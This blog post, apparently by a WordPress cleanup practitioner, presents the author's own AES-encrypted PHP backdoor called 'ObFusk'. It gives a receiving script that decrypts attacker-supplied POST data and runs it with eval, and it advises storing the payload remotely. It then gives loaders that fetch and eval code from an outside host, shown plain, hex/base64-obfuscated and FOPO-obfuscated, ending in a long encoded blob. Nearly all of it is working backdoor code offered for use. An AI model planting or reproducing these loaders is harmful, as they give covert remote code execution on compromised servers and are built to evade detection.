ObFusk – AES256 encrypted/obfuscated PHP Backdoor

I’ve been cleaning up lots of hacked wordpress sites lately and i thought i’d share my findings and also my attempt to refine this technique with AES-encryption instead of obfuscation

Most infections  are hidden within obfuscated code, which means that someone has been trying to hide source code within complex combinations of built in PHP functions like base64_encode, hex encodings and str_rot13 rotations.

Usually you can spot these things just by looking at them and guessing, e.g if values are paired and never reaches above “FF” then we could safely guess that we are working with HEX values. “\x30\x6a\xff”

Obfuscated code is usually easy to find with a few simple techniques, some of which are described in a previous article: unhacking-a-hacked-wordpress-site

This got me thinking, what if we could encrypt the payload and trigger the code with with a password…

I started out by designing a “Control Center” from where i could generate the encrypted payload to be sent to our target server.

You can download it here or try it out here

On your left is the PHP-Code to be executed on remote server, in the middle you have the same code encrypted with AES-256-CBC. And on your right is a preformated curl command with the encrypted script and a password for decryption.

Lets study the curl part:

obfusk=RjdGRitFYjY...

This is your encrypted and urlencoded PHP payload.

key=MjAxOC0wNC0zMA%3D%3D

The decryption password “MjAxOC0wNC0zMA%3D%3D” is attached to the URL. The password is the generation date (in this case 2018-04-30) with base64- and urlencoding.

Now we need a receiving script to decrypt and run our code.

function my_decrypt($data, $key) {
    $encryption_key = base64_decode($key);
    list($encrypted_data, $iv) = explode('::', base64_decode($data), 2);			
    return openssl_decrypt($encrypted_data, 'aes-256-cbc', $encryption_key, 0, $iv);
}

if ( ! empty($_POST['obfusk']) AND ! empty($_GET['key'])) {
    error_reporting(0); 
    eval(my_decrypt($_POST['obfusk'], $_GET['key']));
    die();
}

Best practice would of course be to store your decryption routines on a remote server, then you would only need file_get_contents() or curl to fetch your code.

Example 1 (you need allow_url_fopen)

@eval(file_get_contents("https://bekla.ga/obf.txt"));

Or obfuscated with Hex and Base64

$b="\142\x61\x73\145\66\x34\137\x64\x65\143\x6f\144\x65"; //base64_decode
@eval($b('ZmlsZV9nZXRfY29udGVudHMoImh0dHBzOi8vYmVrbGEuZ2Evb2JmLnR4dCIpOw==')); // file_get_contents("https://bekla.ga/obf.txt");

Example 2 (You need full access to Curl)

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://bekla.ga/obf.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

if(curl_exec($ch) === FALSE) {
	 echo "Error: " . curl_error($ch);
} else {
	 eval(curl_exec($ch));
}
curl_close($ch);

There are also online obfuscators like FOPO – Free Online PHP Obfuscator, following is “Example 1” with FOPO obfuscation.

$f6e83d67="\142\x61\163\x65\x36\x34\137\144\x65\x63\x6f\x64\145";
@eval($f6e83d67( "Ly9OR3ROay84UGx6NnF0Vk1yeDBLaDcwM3pFMnd6OE5lb1grTlkvZ0RmTkQ0YVREdU8xa0RhSjk4UTZQ SVZOSUROSGFLaFZkbXIveHZyQnBmbldqPT06cDFBR0p2MWg5RlpETk49PToyM3JycXA5MQokYWVjM2NiM zY9IlwxNjMiOyR4YWYyMTdhNj0iXDE2MCI7JGMyYjNmYmU5PSJcMTQ2IjskaGZjNWU0ZGQ9IlwxNjMiOy RiM2Y3ZDUyYj0iXDE2MyI7JGhmMjQ3YWVhPSJceDY3IjskZjZlODNkNjc9IlwxNDIiOyRzYzhjZWNiOD0 iXDE2MiI7JHI4NGJjMjAxPSJcMTQ1Ijskc2M4Y2VjYjguPSJceDY1IjskYjNmN2Q1MmIuPSJcMTY0Ijsk ZjZlODNkNjcuPSJceDYxIjskYWVjM2NiMzYuPSJcMTY0Ijskcjg0YmMyMDEuPSJcMTcwIjskaGYyNDdhZ WEuPSJceDdhIjskaGZjNWU0ZGQuPSJceDY4IjskeGFmMjE3YTYuPSJcMTYyIjskYzJiM2ZiZTkuPSJceD Y5IjskaGYyNDdhZWEuPSJceDY5IjskZjZlODNkNjcuPSJceDczIjskc2M4Y2VjYjguPSJcMTYzIjskYWV jM2NiMzYuPSJceDcyIjskaGZjNWU0ZGQuPSJceDYxIjskYzJiM2ZiZTkuPSJceDZjIjskeGFmMjE3YTYu PSJceDY1Ijskcjg0YmMyMDEuPSJceDcwIjskYjNmN2Q1MmIuPSJcMTYyIjskYzJiM2ZiZTkuPSJceDY1I jskZjZlODNkNjcuPSJcMTQ1IjskeGFmMjE3YTYuPSJceDY3IjskaGZjNWU0ZGQuPSJcNjEiOyRzYzhjZW NiOC49Ilx4NjUiOyRyODRiYzIwMS49IlwxNTQiOyRoZjI0N2FlYS49IlwxNTYiOyRhZWMzY2IzNi49Ilw xMzciOyRiM2Y3ZDUyYi49IlwxNDMiOyRiM2Y3ZDUyYi49IlwxNTUiOyRoZjI0N2FlYS49IlwxNDYiOyRz YzhjZWNiOC49IlwxNjQiOyRyODRiYzIwMS49Ilx4NmYiOyRhZWMzY2IzNi49Ilx4NzIiOyRjMmIzZmJlO S49IlwxMzciOyRmNmU4M2Q2Ny49Ilx4MzYiOyR4YWYyMTdhNi49Ilx4NWYiOyR4YWYyMTdhNi49IlwxNj IiOyRhZWMzY2IzNi49Ilx4NmYiOyRjMmIzZmJlOS49Ilx4NjciOyRmNmU4M2Q2Ny49Ilw2NCI7JHI4NGJ jMjAxLj0iXHg2NCI7JGIzZjdkNTJiLj0iXDE2MCI7JGhmMjQ3YWVhLj0iXDE1NCI7JGMyYjNmYmU5Lj0i XHg2NSI7JHI4NGJjMjAxLj0iXHg2NSI7JGhmMjQ3YWVhLj0iXHg2MSI7JGFlYzNjYjM2Lj0iXDE2NCI7J HhhZjIxN2E2Lj0iXHg2NSI7JGY2ZTgzZDY3Lj0iXDEzNyI7JGMyYjNmYmU5Lj0iXDE2NCI7JHhhZjIxN2 E2Lj0iXHg3MCI7JGFlYzNjYjM2Lj0iXDYxIjskZjZlODNkNjcuPSJceDY0IjskaGYyNDdhZWEuPSJcMTY 0IjskeGFmMjE3YTYuPSJceDZjIjskZjZlODNkNjcuPSJcMTQ1IjskYWVjM2NiMzYuPSJcNjMiOyRoZjI0 N2FlYS49IlwxNDUiOyRjMmIzZmJlOS49IlwxMzciOyRjMmIzZmJlOS49IlwxNDMiOyRmNmU4M2Q2Ny49I lx4NjMiOyR4YWYyMTdhNi49Ilx4NjEiOyRjMmIzZmJlOS49Ilx4NmYiOyR4YWYyMTdhNi49IlwxNDMiOy RmNmU4M2Q2Ny49Ilx4NmYiOyRjMmIzZmJlOS49Ilx4NmUiOyRmNmU4M2Q2Ny49Ilx4NjQiOyR4YWYyMTd hNi49IlwxNDUiOyRjMmIzZmJlOS49IlwxNjQiOyRmNmU4M2Q2Ny49Ilx4NjUiOyRjMmIzZmJlOS49Ilwx NDUiOyRjMmIzZmJlOS49IlwxNTYiOyRjMmIzZmJlOS49Ilx4NzQiOyRjMmIzZmJlOS49Ilx4NzMiOyR3N WVlZjc1ZD0kcjg0YmMyMDEoIlw1MCIsX19GSUxFX18pO0BldmFsKCRiM2Y3ZDUyYigkaGZjNWU0ZGQoJH hhZjIxN2E2KCJceDJmXHg1Y1w1MFwxMzRceDIyXDU2XDUyXHg1Y1x4MjJceDVjXDUxXDU3IiwiXHgyOFw 0Mlx4MjJceDI5IiwkeGFmMjE3YTYoIlw1N1wxNVx4N2NceGFceDJmIiwiIiwkYzJiM2ZiZTkoJHNjOGNl Y2I4KCR3NWVlZjc1ZCkpKSkpLCJceDM0XHg2MVwxNDJceDM3XDYzXHgzNlw3MFw3MFw2NVw2NVx4MzlcM TQyXDYxXHgzOVx4MzZceDM2XHgzN1x4MzlcNjBceDMwXDE0MVx4MzFceDYyXHgzMlw2Nlx4NjZceDM1XH gzMVwxNDRceDM4XDYyXHgzMVw2NFx4MzFceDM4XDE0MVx4NjNceDY0XHgzNFwxNDEiKT8kaGYyNDdhZWE oJGY2ZTgzZDY3KCRhZWMzY2IzNigiQ0lZS2VkQVZSQzJLZDN6TFNEK1JXemIwMHpWWldlRUFaZlVWWTRR V2pIREdpYTdNaDljY0luemQ2L0ZjSCtlaFVsenFmQk9TWjcrL2F3dVdVVjQvcEViOEk1YzYwaUVtT3JFb WNxWHdHVTZLMXovYm0vN2UxNDg4V0h0ekdaV2lDaUFwenNQV0gvdE9XYnNHRTA1KzkxbE1zK0IvdVFQV0 RFak8rdlBmUVF3UlFiTnoveVo1Vng0azM0cUtwV05OK0NlMXEvVlc2NTkvcVU3KytVL3ZhMzluL3NqRlZ DQXJSdDluZXdvVHNuTld0MktiVjdrdzhvbnJvNW5saGJSZVdvSWhxaDc5cUJIYldZVE1WVEYzR0w1NkNP eXNvWXhnRjBFQlBRYjZ4VW1ZeFoxRk84L3BiZjdWZi9QTzdEUGVQRXpMZDBMNVlaaTY2REN5bVpPa0JUW HhMMzB2Q3Y0L1B6WkJ2SFVhMlFoOFZGTVNyNEZCN09yT1pwUTB6Qk1TOUMzWWVYVzZiaUNWamxSUkpmRG 5HdEZiRE5jRGNsU253VnVvUUQ3dGh3VHhIRFJxeGpuTVJ1WWM5cllmRUl5dVg5MGhkdzdQcFVwc2x2WWR NR3Z4ZXR2TXFTMkNwWG52QkFGSWhhbGJLZkRjN0dHNW1vdDlYYkNnanpQaEk4MGthVnF1cytvVFptK29w OWUyNWRvQkpSYzdvS2h3RHJwRG44S3YydWJMbzgvRmFWUGx3WGVDTHV1MGtweSttTjFDaXRYcGFrcjQwe FVJdHo0Wm1RUUR0Y3hkbTI4K2lzYVBkTkFzQThZTUhSRi95WEdlWmVTR1cvdmFrWEpqakdPYmExZXd6ST hjdzNwamZqaG04Y0E0YnkvV2ZCRjd0SldDN25BalJ3VzdSTlFJb1RWcGVxTXU4NCtsMTVXVEtBNkYrcnl rbzFxUEQzd2ZnUURJbiszN0hkU1RNOG9kWHZqRGNHVkhCRlNZU3dKbFZZbWVIdkNkSlpiNElVK2dyNkFw QTgrcGI3b2lFek1JdXd5dWJ2Uk9BWkc5emxrdUxsbzdtQVdIZGExcFRQbmZmdWFNMlVJdVN5MDV5S0pNV nJhMDVidDNzU1JkaWwxekRvT0g0enE1a0k5aDZKSUJ6a2N0aXlWd3JxaGpVZDhEa2xDQVR0SlZUaE9JcW hTcnF2a09nOGk3RTFnVVBORkZPUi9BWHpLYkxFeUFMdDJURU1rL1dyWmdsN1RIVTZ0OVBvV0ttcC83T0R NSmo2eGZzOGRkZzVrYnVHOERkdFg5bThGWW5waHNGUWw0SE1CYTVMT0pqNUhqM3hmZWFhbDhnMmUvRGNj TkhOUEpFcWpwUmV5bkcvUldtNkk1b2lOaDhBcTYxbTA4NmkxQVZsVlFTeVY1b3J3SmdzbGwyakZpUFplZ UtnWGtSblR3cHJmeTVIQnR5bmsyeWpxM3loeDhUdldzaVQ2N3VTNWdZYjhXcHNCUVdUdDNpVE14MXIvV3 hPQnByQTQvKy9VYzE4MGNmcXRROTMyU0lReVhxVVR6YmhUTEpTcWVXYlpGdTJaZzJGMHBXcG9oaHFKa3N KTVRMcW9RV2Z6aEZlTWxQZm1DcTlwRjRjRTFBUTJma0t2WmV5ZGM2Z21VYnpITXhsa2x4eTFibkhlSTRU dUVTWkFwd1RzOGVSRGRhQ2VxRTA2SlFZZXJiSkFaU0tBN1Y4d0RwNnNKVWRpS2xXaVMrcklVaG9mYTJTZ kNtbUhraUhKclorbTBVZGh6S25hSEhRcFNZYnJqTEVzV3llV1lPSURtMjcwRW9WREF6RUJnT0ozL2ZNeT JvYmEzT3lMZDl0SmUzcTlnY0FFa0hVYjRDOFF5RnZKZkF6R1JvY2hJOHViaHI5VERxTklUZ1VFL3MvMTF lUy8vTk49PSIpKSk6JGhmMjQ3YWVhKCRmNmU4M2Q2NygkYWVjM2NiMzYoIkNJQ1dlZEFWUkNsS2Mzc2JX ajY0dFBjTmVNblRrcm1UdFQwSmw1c1BNZUNPdEFhNSt4UndHRTlQZHB3WlBYSUZ6cThjRnd3NnRxdC9LN 3BNSEdzTnRPZ045T291UW5Vb0dRQjNUbkxvTXM1WW1JZ2NFYS81MSsvaUNYSExTdnE0MGpCVGlwMGZpdF JWZ2RNeGoybk43dWYybXo1VG5PQzh4NGw0L0NJSzloaTcvalMrc0d6K1NwblFlcitxWExremF6QlJqK2J rS2Y1Vk9LTDlvOTBZUXdxSW04Ymw4cnVEYW1VQjdlSnZnbnVTOUlqYzNZSzAyRnhLbVFHemhHZDdOelJS cjlCT280NStsNjNiZENtZUhJNzNXV3paTHMwNkJ2SUFjaVNmcGdqeDFTNkd2UjJhQll4ZHVBVEZoaHRFU W4xUGxCRTVrK0VWaGhoN3JHd2JRSE9UajNzZDJ5Mmd1NHg1NHV0RmxNa2VNMFZwQU1jNGEwT094eWpXRk dWeHk0UmFDbW5vT2ZNNzUzQkFRNlg3TFNTcllyMHdYQjhKRElCQXUwVDBFSHF0Q2hSYTNzb0FRZjVTRTN oMDRVZGNsSGNES0dsWEFrUGYvczZRTDJ0YXhSRyt4R0lsRXd5SXBWVWxoaUNFYytxbjRkVFQ4YTIxSTRR RFdvSGhyNDZHSHg3YVNZUFBBTXl2TUlOa1hWSUxYMnNvNWdJS1Qrd3dlYXEzUGFISEwzTnBjMk9pN2R0R k04bXR5cWFTS0lRdEVKOHB5NVZpVVM5ajh0VW9PcGpqTEY4dytubnQ1NW1rVk9LVDBFZHkzQzBma3YrU2 xhRHBzL25jOTVjc0kxOC9YeW9oNkVEN1VkWXhyQ1dwQ0VSdjVJeEZKYU1qT2kxbTBFaUM2bTlESHMxcU9 EaWd2dzVkNDRXSXE5RWRyQlJNZlc4NWRhS2RLQm5GcmJ5UEYxbTRRWGV1eW5lWnFWU25ZcVVVanZWQjlZ NlJ6VlhrZHJEWlprd1BtZEptTDFFRkl2ZUdGbjlPbW00UW9QNjJuYkg3aUpId0RjMkpYb2pub25XMFUza zU4cmhXWjU3SnNQN1hiVWFiQ25wUWZvVklWWktWb3NENHpId0hGOG5xTEV4bFFaTXpnQkI3WXdkWE5aQk 1NbVlPZXFRRmMwZnh3ZFhacEptUnVkM09rRkFHTVlhbG51aTZJSXBreWFzVEJFUkljMFdDQTFJTUZtanU 3NkQ0VEpJM0RhelRpYzNqNTRZS1hnQURyWG1HZUNFRUdmUzJYczZuRWYrcEFyNU8zNk15VjFBWWlFTlV5 cGNlVEJJTSsrT0tlbzBSckcrNVoyNCtkR2hJd1B4K3NxMHlVVE8wQmN6ZS9kd0lnR0t6d0lPYjVGVHdRM Gw2UFZqZ2hTYWhDdzBNWCtDOUZxR1VoQm02T0N4Z3laOTdrR0xnRHYrUExpL2pPNkMzUjU0SEdwT1ZDaG haWlNYMHN1NmxFQXkyUzR2VGk1ZTc1L0hMUVdjRjBCUHlEdkJQc3FJTW0rS01INjNXb085bkFzQm52SDF OVFYrRGhRdWk4eFBOdTFIVzlWSGgreUpGYUtaYUtBVFdMTEcrWU1CVktQaS94ZTZyU2UyUGZad2luR1Bj OE1KV24xa0lyMlRkS3AraW15VktQemJCZklvVEFNS1NnU0pSOExLQzVYVlYrQXRuNzA0Z2laOHlXQVY0V 1NXVlBDcC9LbTgvQzcvL09EPT0iKSkpKTs="));

Leave a comment

Your email address will not be published. Required fields are marked *